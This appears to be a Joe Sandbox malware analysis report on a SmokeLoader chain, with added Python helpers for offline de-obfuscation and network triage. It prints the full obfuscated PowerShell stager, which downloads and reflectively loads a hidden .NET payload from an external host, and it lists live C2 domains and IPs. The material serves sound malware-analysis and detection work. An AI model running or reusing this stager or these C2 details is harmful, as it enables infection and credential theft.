Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
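The command line above is a three-stage stager: it downloads a text blob served under a .jpg name, slices out the text between the `<<BASE64_START>>` and `<<BASE64_END>>` markers, reverses it, base64-decodes it, loads the result as a .NET assembly with `Assembly.Load`, and calls `dnlib.IO.Home.VAI` with a URL that has had every `t` replaced by `#`. Note that after the `-replace` the URL is still backwards; the GET for `/250/evenmegoodfor.txt` at `192.3.27.144` in the Networking section is exactly the reverse of the restored string, so the second reversal happens inside the loaded assembly. The following Python helpers, added here as an editorial example (they are not part of the sample and not Joe Sandbox code), reproduce that de-obfuscation offline so an analyst can recover the staging URL and the embedded payload from a captured carrier without executing anything. `SAMPLE_INVOKE` is copied from the command line above; `build_carrier` fabricates a test carrier in the layout the stager expects, since the real Cloudinary blob is not reproduced on this page.

```python
"""Static de-obfuscation helpers for the PowerShell stager in this report.
Editorial example, not sample code. Nothing is downloaded: the carrier text
used for testing is constructed by build_carrier()."""
import base64
import re

MARKER_START = "<<BASE64_START>>"
MARKER_END = "<<BASE64_END>>"

# Fragment copied verbatim from the command line in this report.
SAMPLE_INVOKE = ("$subtractions.Invoke($null, @($restoredText, 'chlorinations', "
                 "'chlorinations', 'chlorinations', 'aspnet_compiler', "
                 "'chlorinations', 'chlorinations','chlorinations','chlorinations',"
                 "'chlorinations','chlorinations','chlorinations','1',"
                 "'chlorinations','TaskName'));")


def restore_url(obfuscated: str) -> str:
    """The script only swaps '#' back to 't'; the string is also stored
    reversed, and the GET in the Networking section shows the final form,
    so undo both transforms here."""
    return obfuscated.replace("#", "t")[::-1]


def extract_payload(carrier: str) -> bytes:
    """Emulate the stager: slice between the markers, reverse, base64-decode.
    The original evaluates '$uscher -ge 0 -and $diffamed -gt $uscher' and
    throws the result away; this version fails loudly instead."""
    start = carrier.find(MARKER_START)
    end = carrier.find(MARKER_END)
    if start < 0 or end <= start:
        raise ValueError("payload markers missing or out of order")
    start += len(MARKER_START)
    reversed_b64 = carrier[start:end]
    # validate=True rejects stray bytes; strip whitespace first if a real
    # carrier wraps its base64 across lines.
    return base64.b64decode(reversed_b64[::-1], validate=True)


def build_carrier(payload: bytes, filler: str = "not-really-a-jpeg ") -> str:
    """Constructed test input laid out the way the stager expects it."""
    reversed_b64 = base64.b64encode(payload).decode()[::-1]
    return filler + MARKER_START + reversed_b64 + MARKER_END + filler


def parse_invoke_args(cmd: str) -> list:
    """Return the argument list handed to the reflected VAI method: quoted
    strings unquoted, PowerShell variables kept as '$name'."""
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", cmd, re.DOTALL)
    if not m:
        return []
    pairs = re.findall(r"'([^']*)'|(\$\w+)", m.group(1))
    return [s if s else v for s, v in pairs]


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check before handing the blob to a .NET disassembler."""
    return blob[:2] == b"MZ"


if __name__ == "__main__":
    print(restore_url("#x#.rofdoogemneve/052/441.72.3.291//:p##h"))
    print(parse_invoke_args(SAMPLE_INVOKE))
```

The argument list is worth keeping: position 4 is `aspnet_compiler`, which matches the `aspnet_compiler.pdb` string the report later finds in the dropped `uahuajd` binary, and the trailing `'1'` and `'TaskName'` are the only non-filler values besides the URL.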
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T08:02:45.418836+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.7 | 49913 | 46.173.214.14 | 80 | TCP
2025-01-09T08:02:50.795369+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.7 | 49942 | 46.173.214.14 | 80 | TCP
2025-01-09T08:04:02.534429+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 46.173.214.14 | 80 | TCP
2025-01-09T08:04:04.159872+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 46.173.214.14 | 80 | TCP
2025-01-09T08:02:45.689594+0100 | 2829848 | 2 | Potentially Bad Traffic | 46.173.214.14 | 80 | 192.168.2.7 | 49913 | TCP


            AV Detection

Source: http://prolinice.ga/index.php | Avira URL Cloud: Label: malware
Source: http://vilendar.ga/index.php | Avira URL Cloud: Label: malware
Source: http://192.3.27.144/250/evenmegoodfor.txt | Avira URL Cloud: Label: malware
Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbs | ReversingLabs: Detection: 15%
Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbs | Virustotal: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A03098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,14_2_00A03098
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A03717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,14_2_00A03717
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A03E04 RtlCompareMemory,CryptUnprotectData,14_2_00A03E04
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A01198 CryptBinaryToStringA,CryptBinaryToStringA,14_2_00A01198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,14_2_00A011E1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A0123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,14_2_00A0123B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A01FCE CryptUnprotectData,RtlMoveMemory,14_2_00A01FCE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_008026AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,17_2_008026AC
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_0016178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,18_2_0016178C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_0016118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,18_2_0016118D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_00862404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,20_2_00862404
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_0086245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,20_2_0086245E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_0086263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,20_2_0086263E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,26_2_001B2799
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B25A4 CryptBinaryToStringA,CryptBinaryToStringA,26_2_001B25A4
Source: Binary string: aspnet_compiler.pdb | source: uahuajd, 0000000D.00000000.1710544109.00000000000F2000.00000002.00000001.01000000.00000007.sdmp, uahuajd.12.dr
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,14_2_00A02B15
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,14_2_00A01D4A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,14_2_00A03ED9
Source: C:\Windows\explorer.exe | Code function: 16_2_009B30A8 FindFirstFileW,FindNextFileW,FindClose,16_2_009B30A8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0080255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,17_2_0080255C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001615BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,18_2_001615BE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001614D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,18_2_001614D8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001613FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,18_2_001613FE
Source: C:\Windows\explorer.exe | Code function: 19_2_009E1EB4 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1EB4
Source: C:\Windows\explorer.exe | Code function: 19_2_009E1DB0 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1DB0
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

            Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49913 -> 46.173.214.14:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49942 -> 46.173.214.14:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49987 -> 46.173.214.14:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49988 -> 46.173.214.14:80
Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 46.173.214.14 80
Source: Malware configuration extractor | URLs: http://prolinice.ga/index.php
Source: Malware configuration extractor | URLs: http://vilendar.ga/index.php
Source: global traffic | HTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1 | Host: 192.3.27.144 | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.14:80 -> 192.168.2.7:49913
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xeoxlfalojah.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: prolinice.ga
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://prolinice.ga/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 501 | Host: prolinice.ga
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gsfmhaothvg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: prolinice.ga
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yilwfgipaws.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: prolinice.ga
Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.27.144 (26 identical entries in the report)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 identical entries in the report)
Source: global traffic | HTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1 | Host: 192.3.27.144 | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic | DNS traffic detected: DNS query: prolinice.ga
Source: unknown | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xeoxlfalojah.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: prolinice.ga
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:02:45 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 
3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:02:50 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:04:02 GMTServer: Apache/2.4.59 (Debian)Content-Length: 115Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:04:03 GMTServer: Apache/2.4.59 (Debian)Content-Length: 115Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ
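Two things in the traffic above are worth turning into triage logic. First, the beacons are form-encoded POSTs to `/index.php` whose `Referer` names an unrelated, apparently random domain (`xeoxlfalojah.net`, `gsfmhaothvg.com`, `yilwfgipaws.com`) while `Host` is `prolinice.ga`, and the stage-two GET goes to a bare IP with no preceding DNS query. Second, the C2 answers every beacon with `404 Not Found`, but only one of those 404s (Content-Length 409) is a real Apache error page; the others carry a binary body, and in the 115-byte replies the first four bytes are the little-endian value 111, i.e. the body length minus four. That is why the ETPRO rule fires on a "404": a 404 from this server is not evidence that the request failed. The Python below is an added editorial example (not Joe Sandbox or sample code) that runs those heuristics over transactions transcribed from this report; the binary 404 body is padded with zeros after the bytes the report shows, and the length-prefix check is labelled as an observation from these captures rather than a documented protocol property.

```python
"""Heuristic triage of the HTTP transactions in this report's Networking
section. Editorial example; the records below are transcribed from the
request/response lines above (binary body tail is constructed padding)."""
import re
import struct
from urllib.parse import urlparse

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# First beacon from the report (body omitted; the report shows only headers).
BEACON_1 = ("POST /index.php HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            "Referer: http://xeoxlfalojah.net/\r\n"
            f"User-Agent: {IE11_UA}\r\nContent-Length: 310\r\nHost: prolinice.ga\r\n\r\n")
# Stage-two download observed after the PowerShell stager ran.
STAGE_GET = ("GET /250/evenmegoodfor.txt HTTP/1.1\r\nHost: 192.3.27.144\r\n"
             "Connection: Keep-Alive\r\n\r\n")
# Body of the genuine Apache 404 (Content-Length 409), truncated.
HTML_404 = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
            b'<title>404 Not Found</title>')
# Body of the 115-byte 404: first 12 bytes as shown, rest zero-padded here.
BINARY_404 = b"\x6f\x00\x00\x00\xa0\x5f\xe8\x0a\x27\xe8\xd3\xd3" + b"\x00" * 103


def parse_request(raw: str) -> dict:
    """Split 'METHOD PATH VERSION' plus headers (lower-cased names) and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def beacon_reasons(req: dict) -> list:
    """Indicators a request shares with the beacons seen in this report."""
    h = req["headers"]
    reasons = []
    if (req["method"] == "POST" and req["path"] == "/index.php"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        reasons.append("form POST to /index.php")
    referer_host = urlparse(h.get("referer", "")).hostname
    if referer_host and referer_host != h.get("host"):
        reasons.append(f"Referer host {referer_host} != Host {h.get('host')}")
    if h.get("user-agent") == IE11_UA:
        reasons.append("hard-coded IE11 User-Agent (weak on its own)")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", h.get("host", "")):
        reasons.append("bare-IP Host (no DNS lookup expected)")
    return reasons


def response_reasons(status: int, body: bytes) -> list:
    """Flag a 404 whose body is not HTML; a real error page starts with '<'."""
    reasons = []
    if status == 404 and body and not body.lstrip().startswith(b"<"):
        reasons.append("404 with non-HTML body")
        # Observed in this report's 115-byte replies, not a documented format.
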